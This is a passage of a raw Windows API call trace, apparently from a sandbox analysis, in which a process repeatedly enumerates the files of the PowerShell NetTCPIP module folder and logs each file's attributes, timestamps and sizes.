lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetIPAddress.cdxml", cAlternateFileName="")) returned 1 [0265.186] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6029, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetIPInterface.cdxml", cAlternateFileName="")) returned 1 [0265.186] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetIPv4Protocol.cdxml", cAlternateFileName="")) returned 1 [0265.186] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb92823, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfb92823, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfb92823, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x37ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetIPv6Protocol.cdxml", cAlternateFileName="")) returned 1 [0265.186] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x29e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNeighbor.cdxml", cAlternateFileName="")) returned 1 [0265.187] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb92823, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfb92823, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfb92823, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x149b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetOffloadGlobalSetting.cdxml", cAlternateFileName="")) returned 1 [0265.187] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x55d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetPrefixPolicy.cdxml", cAlternateFileName="")) returned 1 [0265.187] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x403b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetRoute.cdxml", cAlternateFileName="")) returned 1 [0265.188] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x11ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetTCPConnection.cdxml", cAlternateFileName="")) returned 1 [0265.188] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbdece0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbdece0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbdece0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3eb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetTCPSetting.cdxml", cAlternateFileName="")) returned 1 [0265.189] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb92823, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfb92823, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfb92823, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetTransportFilter.cdxml", cAlternateFileName="")) returned 1 [0265.189] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetUDPEndpoint.cdxml", cAlternateFileName="")) returned 1 [0265.190] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x72d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetUDPSetting.cdxml", cAlternateFileName="")) returned 1 [0265.190] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb92823, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfb92823, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x393a, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPConfiguration.psm1", cAlternateFileName="")) returned 1 [0265.191] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x862, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetTCPIP.psd1", cAlternateFileName="")) returned 1 [0265.191] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x11582, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tcpip.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.192] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb6a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tcpip.Types.ps1xml", cAlternateFileName="")) returned 1 [0265.192] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3fcf, dwReserved0=0x0, dwReserved1=0x0, cFileName="Test-NetConnection.psm1", cAlternateFileName="")) returned 1 [0265.193] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3fcf, dwReserved0=0x0, dwReserved1=0x0, cFileName="Test-NetConnection.psm1", cAlternateFileName="")) returned 0 [0265.194] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0265.194] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.194] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP", lpFilePart=0x0) returned 0x3b [0265.194] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.195] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.195] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbdece0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbdece0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbdece0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x416, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetCompartment.cdxml", cAlternateFileName="")) returned 1 [0265.196] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetIPAddress.cdxml", cAlternateFileName="")) returned 1 [0265.196] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6029, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetIPInterface.cdxml", cAlternateFileName="")) returned 1 [0265.197] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetIPv4Protocol.cdxml", cAlternateFileName="")) returned 1 [0265.197] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb92823, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfb92823, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfb92823, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x37ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetIPv6Protocol.cdxml", cAlternateFileName="")) returned 1 [0265.198] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x29e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetNeighbor.cdxml", cAlternateFileName="")) returned 1 [0265.198] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb92823, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfb92823, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfb92823, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x149b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetOffloadGlobalSetting.cdxml", cAlternateFileName="")) returned 1 [0265.199] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x55d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetPrefixPolicy.cdxml", cAlternateFileName="")) returned 1 [0265.199] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x403b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetRoute.cdxml", cAlternateFileName="")) returned 1 [0265.200] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x11ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetTCPConnection.cdxml", cAlternateFileName="")) returned 1 [0265.200] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbdece0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbdece0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbdece0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3eb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetTCPSetting.cdxml", cAlternateFileName="")) returned 1 [0265.201] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb92823, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfb92823, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfb92823, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetTransportFilter.cdxml", cAlternateFileName="")) returned 1 [0265.201] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetUDPEndpoint.cdxml", cAlternateFileName="")) returned 1 [0265.201] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x72d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetUDPSetting.cdxml", cAlternateFileName="")) returned 1 [0265.202] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb92823, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfb92823, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x393a, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetIPConfiguration.psm1", cAlternateFileName="")) returned 1 [0265.202] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x862, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetTCPIP.psd1", cAlternateFileName="")) returned 1 [0265.203] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x11582, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tcpip.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.203] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb6a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tcpip.Types.ps1xml", cAlternateFileName="")) returned 1 [0265.204] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3fcf, dwReserved0=0x0, dwReserved1=0x0, cFileName="Test-NetConnection.psm1", cAlternateFileName="")) returned 1 [0265.204] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0265.204] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP", lpFilePart=0x0) returned 0x3b [0265.205] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dafc0 [0265.205] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.206] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbdece0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbdece0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbdece0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x416, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetCompartment.cdxml", cAlternateFileName="")) returned 1 [0265.206] FindNextFileW (in: 